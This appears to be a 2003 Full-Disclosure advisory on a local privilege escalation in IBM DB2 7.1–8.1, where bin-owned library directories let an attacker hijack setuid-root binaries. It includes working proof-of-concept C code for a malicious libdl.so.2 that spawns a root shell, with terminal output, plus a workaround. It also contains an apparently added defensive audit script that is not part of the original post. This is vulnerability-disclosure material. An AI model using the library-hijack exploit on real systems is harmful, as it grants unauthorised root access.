[Full-Disclosure] Slight privilege elevation from bin to root in IBM DB2 7.1 - 8.1 all binaries

From: paskat_private
Date: Tue Aug 05 2003 - 07:11:41 PDT


     Title:    Local Vulnerability in IBM DB2 7.1 - 8.1 all binaries
     Date:     27-07-2003
     Platform: Only tested on Linux, but the issue can likely be reproduced on other platforms.
    	   Only versions 7.1 and Enterprise Server Edition v8.1 were checked,
    	   but other versions could be affected.
     Impact:   Slight privilege elevation from bin to root.
     Author:   Juan Manuel Pascual Escriba <paskat_private>
     Status:   Vendor contacted; details below.
    
    
    PROBLEM SUMMARY:
    
     DB2 Universal Database Enterprise Server Edition versions 7.1 and 8.1 are installed
    under /home directories and place their libraries in:
    	/usr/IBMdb2/V7.1/lib for version 7.1
    	/opt/IBM/db2/V8.1/lib for version 8.1
    
    In both versions the lib directory is owned by bin.bin. If a local or remote attacker
    could compromise the bin account, it would be possible to elevate privileges to root immediately
    by creating a shared object (.so) library in that directory.
    
    
    DESCRIPTION
    
    DB2 libraries are installed owned by bin in my default installation of versions 7.1 & 8.1:
    
    [pask@dimoniet home]$ ls -alc /usr/IBMdb2/V7.1 
    ...
    drwxr-xr-x    2 bin      bin          4096 Jun 21  2002 java12
    drwxr-xr-x    2 bin      bin          4096 Jul 30 19:54 lib
    drwxr-xr-x    2 bin      bin          4096 Jun 21  2002 map
    ...
    
    [pask@dimoniet home]$ ls -alc /opt/IBM/db2/V8.1/
    ...
    drwxr-xr-x    2 bin      bin          4096 Dec 11  2002 java
    drwxr-xr-x    2 bin      bin          4096 Dec 11  2002 lib
    drwxr-xr-x   30 bin      bin          4096 Dec 11  2002 license
    drwxr-xr-x    2 bin      bin          4096 Dec 11  2002 map
    ...
    
    
    For the bin user it is trivially easy to create a shared library, something like:
    
    #include <stdio.h>
    #include <stdlib.h>     /* system() */
    #include <unistd.h>     /* getpid(), geteuid() */
    
    /* Runs when the dynamic linker loads the library, before the program's main();
       the process already carries the effective uid of the setuid binary. */
    void _init(void) {
       printf("en el _init()\n");
       /* geteuid() so that the printed value matches the EUID label */
       printf("Con PID=%i y EUID=%i\n", (int)getpid(), (int)geteuid());
       system("/bin/bash");
       printf("Saliendo del Init()\n");
    }
    
    compile it as /usr/IBMdb2/V7.1/lib/libdl.so.2 and run any of the setuid-root binaries, for example:
    	-r-s--x--x    1 root     db2asgrp    15557 Jul 31 00:42 db2cacpy
    	-r-sr-s--x    1 root     db2asgrp    17562 Jun 21  2002 db2dari
    	-r-s--x--x    1 root     db2asgrp    68291 Jun 21  2002 db2genp
    	-r-sr-x--x    1 root     db2asgrp    97722 Jun 21  2002 db2licd
    	-r-sr-s--x    1 root     db2asgrp    23063 Jul 29 03:15 db2start
    	-r-sr-s--x    1 root     db2asgrp    24396 Jun 21  2002 db2stop
    	-r-sr-s---    1 root     db2asgrp    50879 Jun 21  2002 db2sysc
    	-r-sr-s--x    1 root     db2asgrp    81925 Jun 21  2002 db2udf
    	-r-sr-s--x    1 root     db2asgrp    16940 Jun 21  2002 db2udfi
    
    [bin@dimoniet adm]$ /home/db2as/sqllib/adm/db2cacpy
    /home/db2as/sqllib/adm/db2cacpy: /usr/IBMdb2/V7.1/lib/libdl.so.2: no version information available (required by /usr/IBMdb2/V7.1/lib/libdb2.so.1)
    /home/db2as/sqllib/adm/db2cacpy: /usr/IBMdb2/V7.1/lib/libdl.so.2: no version information available (required by /usr/IBMdb2/V7.1/lib/libdb2.so.1)
    en el _init()
    Con PID=10477 y EUID=0
    No value for $TERM and no -T specified
    No value for $TERM and no -T specified
    [root@dimoniet adm]# id
    uid=0(root) gid=0(root) groups=1(bin)
    [root@dimoniet adm]# exit
    exit
    Saliendo del Init()
    [bin@dimoniet adm]$
    
    
    For the 8.1 installation, the same strategy. I create a /opt/IBM/db2/V8.1/lib/libdl.so.2 and exec some of these files (more setuid-root files exist in other directories):
    
    	-r-s--x--x    1 root     db2grp1     70445 Dec 11  2002 db2cacpy
    	-r-sr-s--x    1 root     db2grp1     78272 Dec 11  2002 db2fmp
    	-r-sr-s--x    1 root     db2grp1     75101 Dec 11  2002 db2fmpterm
    	-r-s--x--x    1 root     db2grp1    101419 Dec 11  2002 db2genp
    	-r-sr-x--x    1 root     db2grp1    180378 Dec 11  2002 db2licd
    	-r-sr-s--x    1 root     db2grp1     38044 Dec 11  2002 db2start
    	-r-sr-s--x    1 root     db2grp1     84713 Dec 11  2002 db2stop
    
    [bin@dimoniet adm]$ ./db2start
    ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2e.so.1)
    ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2e.so.1)
    ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2osse.so.1)
    ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2osse.so.1)
    en el _init()
    Con PID=10540
    Con EUID=0
    No value for $TERM and no -T specified
    No value for $TERM and no -T specified
    [root@dimoniet adm]# id
    uid=0(root) gid=0(root) groups=1(bin)
    [root@dimoniet adm]# exit
    exit
    Saliendo del Init()
    SQL1042C  An unexpected system error occurred.  SQLSTATE=58004
    
    
    	
    IMPACT:
    
    	The bin user can gain root privileges through the DB2 installation.
    
    
     EXPLOIT
    
    	Described above.
    
    
     WORKAROUND
    
    	chown the DB2 lib directory and its libraries to root, so that the bin account can no longer replace them.
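
    To check for the condition described above and to apply the workaround, here is an added example (my own, not code from the advisory or from IBM): a POSIX shell audit that reports entries in a library directory that are not owned by root or that are group/world-writable, a helper that lists the RPATH/RUNPATH a binary carries, and the chown/chmod fix. The two DB2 paths are the ones named in the advisory; the function names, the DB2_LIB_DIRS variable and the dependence on binutils readelf are my own assumptions.

```sh
#!/bin/sh
# Added example, not code from the advisory: audit a library directory that
# setuid-root DB2 binaries load from, and apply the advisory's workaround.
# Two conditions are reported, because either one lets a compromised
# unprivileged account such as bin replace a library that later runs as root:
#   1. an entry not owned by root (uid 0), which is the bin.bin ownership of
#      /usr/IBMdb2/V7.1/lib and /opt/IBM/db2/V8.1/lib shown in the advisory;
#   2. an entry writable by group or others.
# The function names below are my own; DB2_LIB_DIRS holds the two paths
# named in the advisory.

DB2_LIB_DIRS="/usr/IBMdb2/V7.1/lib /opt/IBM/db2/V8.1/lib"

# Print one "path: reason" line per finding. Always returns 0 so callers
# can collect the output; use audit_count to get a number.
audit_libdir() {
    dir=$1
    # Entries whose owner is not uid 0. "-user 0" is POSIX (a numeric uid is
    # accepted when it is not a user name), so it works even without a
    # "root" entry in /etc/passwd.
    find "$dir" ! -user 0 -print 2>/dev/null \
        | sed 's/$/: not owned by root/'
    # Entries writable by group or others. Symlinks are skipped: their mode
    # bits are meaningless, and the owner check above already covers them.
    find "$dir" ! -type l \( -perm -g+w -o -perm -o+w \) -print 2>/dev/null \
        | sed 's/$/: group- or world-writable/'
    return 0
}

# Number of findings for DIR; prints 0 when the directory is clean.
audit_count() {
    audit_libdir "$1" | awk 'END { print NR }'
}

# List the library search path a binary carries (RPATH/RUNPATH), which is
# where a loader would pick up a replaced libdl.so.2. Assumes binutils
# readelf is installed; it inspects the file statically and does not run it.
binary_search_path() {
    readelf -d "$1" 2>/dev/null | awk '/\(RPATH\)|\(RUNPATH\)/ { print $NF }'
}

# The advisory's workaround; must run as root. Make root own the directory
# and every library in it, and strip group/other write bits.
harden_libdir() {
    chown -R 0:0 "$1" && chmod -R go-w "$1"
}

# Example run against the advisory's paths, skipping those not present.
for d in $DB2_LIB_DIRS; do
    if [ -d "$d" ]; then
        echo "== $d: $(audit_count "$d") finding(s)"
        audit_libdir "$d"
    fi
done
```

    Run the audit first; a clean directory prints nothing and audit_count prints 0. Only then run harden_libdir as root, and re-run the audit afterwards to confirm that no entry is left owned by bin or writable by the group. The owner check is the one that matters for the default DB2 installation, since the directories shown above are mode 755 but owned by bin.bin.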
    
    
     STATUS 
    
         This bug was reported to security-alertat_private on July 27.
    After that, on July 29, IBM security staff forwarded my emails as bcc to the DB2
    security team. As of 5 August I haven't any idea about the DB2 security team's emails
    or how to contact it.
    
    
    
    
    --------------------------------------------------
    This vulnerability was researched by:
    Juan Manuel Pascual Escriba            paskat_private
    
    
    http://concepcion.upv.es/~pask/advisories/2003/IBM%20DB2%20so-libraries
    
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    


